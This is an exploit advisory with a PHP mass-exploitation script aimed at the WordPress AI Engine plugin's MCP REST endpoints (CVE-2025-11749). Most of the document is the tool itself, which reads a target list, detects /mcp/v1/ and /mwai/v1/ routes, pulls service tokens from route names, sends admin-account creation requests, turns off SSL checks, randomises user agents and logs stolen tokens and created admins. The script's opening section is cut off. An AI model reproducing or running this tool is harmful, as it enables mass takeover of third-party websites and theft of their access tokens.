=============================================================================================================================================
| # Title : WordPress AI Engine 3.1.3 Mass MCP Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/ai-engine/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211374/ & CVE-2025-11749
[+] Summary :
This advisory documents a fully automated PHP-based exploitation framework designed to perform mass enumeration,
plugin detection, token extraction, and automated account creation targeting vulnerable WordPress MCP-related REST API endpoints.
The tool uses polymorphic payload generation, bypasses SSL verification, and integrates a dual-mode engine (CLI & HTML).
It is suitable for mass‑scale penetration testing, vulnerability validation, and research purposes.
The script allows:
Automatic POST-based admin creation attempts
Automatic detection of API routes /mcp/v1/ and /mwai/v1/
Automated token extraction
HTML Exploitation UI
Randomized payload polymorphism
Mass target input (list-based)
Logging of results to multiple output files
[+] Vulnerability Description :
Several WordPress MCP plugins expose insecure REST API endpoints under
/wp-json/mcp/v1/*
/wp-json/mwai/v1/*
[+] Some installations allow:
Unauthenticated access
Token disclosure
User creation without privilege checks
Sensitive route discovery
The tool exploits these weaknesses by programmatically interacting with the endpoints to extract tokens and perform automated admin creation attempts.
Impact
[+] A remote attacker can:
Extract valid service tokens
Register new administrator-level accounts
Access endpoints intended for privileged users
Automate exploitation across thousands of hosts
Perform further attacks using the obtained tokens
Impact Rating: Critical
[+] 3. Poc
save as scan.php
Add one target per line: targets.txt
php scan.php targets.txt
File Description
success_results.txt Successful token captures
tokens_only.txt Extracted tokens only
created_admins.txt Accounts created via POST exploit
--------------------------------
true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($data),
CURLOPT_USERAGENT => $user_agent,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 20,
CURLOPT_HTTPHEADER => $headers
]);
$response = curl_exec($ch);
$info = curl_getinfo($ch);
curl_close($ch);
return [$response, $info];
}
// ============================================================================
// Process Target
// ============================================================================
function process_target($url) {
global $target_username, $target_password, $target_email, $successFile;
$payload = generate_payload();
list($resp, $info) = send_post($url, [
"username" => $target_username,
"password" => $target_password,
"email" => $target_email,
"payload" => $payload
]);
if (preg_match('/token[\"\:\s]+([A-Za-z0-9\.\-\_]+)/i', $resp, $m)) {
$token = $m[1];
write_token($url, $token);
file_put_contents($successFile, "$url => SUCCESS | token: $token\n", FILE_APPEND);
}
return $resp;
}
// ============================================================================
// Main Entry Point
// ============================================================================
if (php_sapi_name() == "cli") {
banner();
global $argc, $argv;
if ($argc < 2) {
die("Usage: php script.php targets.txt\n");
}
$targets_file = $argv[1];
if (!file_exists($targets_file)) {
die("[-] Target list not found.\n");
}
$targets = file($targets_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
foreach ($targets as $t) {
echo "[*] Processing: $t\n";
process_target($t);
echo "[OK] Completed\n\n";
}
}
// ============================================================================
// Mass MCP Exploit (HTML Version)
// ============================================================================
function rand_color() {
return "rgb(" . rand(34,85) . "," . rand(49,160) . "," . rand(63,255) . ")";
}
function print_banner_html() {
$banner = "
__ __ _ _____ _ _____ ____
| \/ | / \ | ____| | | ____| _ \
| |\/| | / _ \ | _| | | | _| | |_) |
| | | |/ ___ \| |___| |___| |___| _ <
|_| |_/_/ \_\_____|_____|_____|_| \_\
";
foreach (explode("\n", $banner) as $line) {
echo "$line
";
}
echo "
Mass MCP Exploit | Nxploited (Converted by Indoushka)
";
}
function read_targets_html($file) {
if (!file_exists($file)) return [];
$out = [];
foreach (file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $u) {
$u = trim($u);
if ($u === "") continue;
if (!preg_match("#^https?://#i", $u)) {
$u = "http://" . $u;
}
$out[] = $u;
}
return $out;
}
function write_result_html($file, $msg) {
file_put_contents($file, $msg . "\n", FILE_APPEND);
}
function http_get_json($url) {
$ua = "Mozilla/5.0 (Windows NT " . rand(7, 11) . ") AppleWebKit/" . rand(500, 999);
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_TIMEOUT => 10,
CURLOPT_USERAGENT => $ua
]);
$out = curl_exec($ch);
curl_close($ch);
return json_decode($out, true);
}
function plugin_installed($url) {
$data = http_get_json(rtrim($url, "/") . "/wp-json/");
if (!isset($data["routes"])) return false;
foreach ($data["routes"] as $route => $v) {
if (strpos($route, "/mcp/v1/") === 0) return true;
if (strpos($route, "/mwai/v1/") === 0) return true;
}
return false;
}
function find_token($url) {
$data = http_get_json(rtrim($url, "/") . "/wp-json/mcp/v1/");
if (!isset($data["routes"])) return null;
foreach ($data["routes"] as $route) {
$parts = explode("/", trim($route, "/"));
if (count($parts) >= 4 && $parts[0] == "mcp" && $parts[1] == "v1" && end($parts) == "sse") {
$token = $parts[2];
if ($token !== "" && strpos($token, "/") === false) {
write_result_html("tokens_only.txt", "$url => $token");
return $token;
}
}
}
return null;
}
function process_target_html($url) {
echo "[*] Checking: $url
";
if (!plugin_installed($url)) {
echo "[x] Plugin not installed
";
return;
}
$token = find_token($url);
if ($token) {
echo "[+] Token: $token
";
write_result_html("success_results.txt", "$url => TOKEN: $token");
} else {
echo "[-] No token
";
}
}
// ============================================================================
// Nxploited Worker
// ============================================================================
function Nxploited_worker($targets) {
if (!is_array($targets)) {
echo "Error: targets must be array.\n";
return;
}
foreach ($targets as $target) {
echo "[*] Checking internet: $target\n";
Nxploited_internet_check($target);
}
}
function Nxploited_internet_check($target) {
$payload = "Nxploited-Check-" . md5($target . microtime(true));
$ctx = stream_context_create([
"http" => [
"method" => "GET",
"timeout" => 5,
"header" => "User-Agent: $payload\r\n"
]
]);
$res = @file_get_contents($target, false, $ctx);
if ($res !== false) {
echo "[OK] Connection success: $target\n";
} else {
echo "[FAIL] Unreachable: $target\n";
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================